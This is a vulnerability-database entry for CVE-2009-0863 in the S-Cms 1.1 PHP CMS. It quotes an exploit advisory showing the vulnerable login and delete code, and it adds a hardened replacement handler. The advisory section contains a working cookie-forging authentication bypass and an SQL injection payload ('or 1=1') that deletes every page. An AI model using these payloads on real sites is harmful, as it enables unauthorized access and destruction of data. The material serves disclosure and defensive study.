Matteoiammarrone S-CMS 'admin/delete_page.php' SQL Injection Vulnerability

Vulnerability ID: 1117409
Vulnerability type: SQL injection
Published: 2009-02-17
Updated: 2009-03-10
CVE ID: CVE-2009-0863
CNNVD-ID: CNNVD-200903-198
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/8071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-198
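|Vulnerability details
S-Cms is a content management system (CMS) based on PHP/MySQL. A SQL injection vulnerability exists in admin/delete_page.php of S-Cms 1.1 Stable. A remote attacker can execute arbitrary SQL commands via the id parameter.
|Exploit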
#########################################################################################
[0x01] Information:

Name           : S-Cms 1.1 Stable 
Download       : http://www.hotscripts.com/listings/jump/download/87992/
Vulnerability  : Insecure Cookie Handling / Mass Page Delete
Author         : x0r
Contact        : andry2000@hotmail.it
Notes          : Proud to be Italian 
#########################################################################################
[0x02] Bug:

Bugged file is /[path]/login_action.php ... /admin/delete_page.php

[Code]

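// login_action.php: credentials as submitted by the login form
$user=$_POST['username'];
$pass=$_POST['password'];

$select_admin = mysql_query("SELECT * FROM cms_admin");

// Each row overwrites the previous one, so only the last admin row is compared
while($dati_admin=mysql_fetch_array($select_admin)){
$username=$dati_admin['username'];
$password=$dati_admin['password'];
}

if ($user == $username && $pass == $password){

   // The only login state is a client-side cookie with the constant value "OK"
   setcookie("login", "OK", time() + $logintime); #0wn3d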

[/code]

[CODE]
	
// delete_page.php: id is read from the query string and placed in the statement unescaped
$id=$_GET['id'];

$delete=mysql_query("DELETE FROM cms_content WHERE id='$id'");

if ($delete){
    echo ""._DELETE_PAGE_SUCCESS."";
} else {
    echo ""._DELETE_PAGE_ERROR."";
}
[/code]

#########################################################################################
[0x03] Exploit:

Exploit: 1- javascript:document.cookie = "login=OK; path=/"
         2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*

########################################################################################

# milw0rm.com [2009-02-17]
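
A hardened form of the delete handler quoted in the advisory, as an added example that is not S-Cms code and not part of the original advisory. It assumes PDO with MySQL, a server-side session flag `is_admin` set at login, a per-session `csrf_token`, and placeholder connection settings; none of these names come from the page.

```php
<?php
// Added example: hardened replacement for admin/delete_page.php.
// Assumed names: $_SESSION['is_admin'], $_SESSION['csrf_token'], DSN values.
declare(strict_types=1);

session_start();

// 1. Authorization is server-side session state, not a cookie whose value
//    (login=OK) any client can set for itself.
if (empty($_SESSION['is_admin'])) {
    http_response_code(403);
    exit('Forbidden');
}

// 2. Deleting changes state: accept POST only and require the CSRF token.
$expected = $_SESSION['csrf_token'] ?? '';
$token    = $_POST['csrf_token'] ?? '';
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || !is_string($expected) || $expected === ''
    || !is_string($token) || !hash_equals($expected, $token)) {
    http_response_code(400);
    exit('Bad request');
}

// 3. The id must be a positive integer; anything else is rejected outright.
$id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT,
                   ['options' => ['min_range' => 1]]);
if ($id === false || $id === null) {
    http_response_code(400);
    exit('Invalid page id');
}

// 4. Bound parameter: the value is never part of the SQL text, so input such
//    as "' or 1=1/*" cannot widen the WHERE clause to every row.
$pdo = new PDO('mysql:host=localhost;dbname=scms;charset=utf8mb4',
               'cms_user', 'placeholder-password', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false,
]);
$stmt = $pdo->prepare('DELETE FROM cms_content WHERE id = :id');
$stmt->execute([':id' => $id]);

// 5. Report on rows actually removed, not merely on the query having run.
echo $stmt->rowCount() === 1 ? 'Page deleted' : 'Page not found';
```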
|References

Source: XF
Name: scms-deletepage-sql-injection(48806)
Link: http://xforce.iss.net/xforce/xfdb/48806
Source: BID
Name: 33799
Link: http://www.securityfocus.com/bid/33799
Source: MILW0RM
Name: 8071
Link: http://www.milw0rm.com/exploits/8071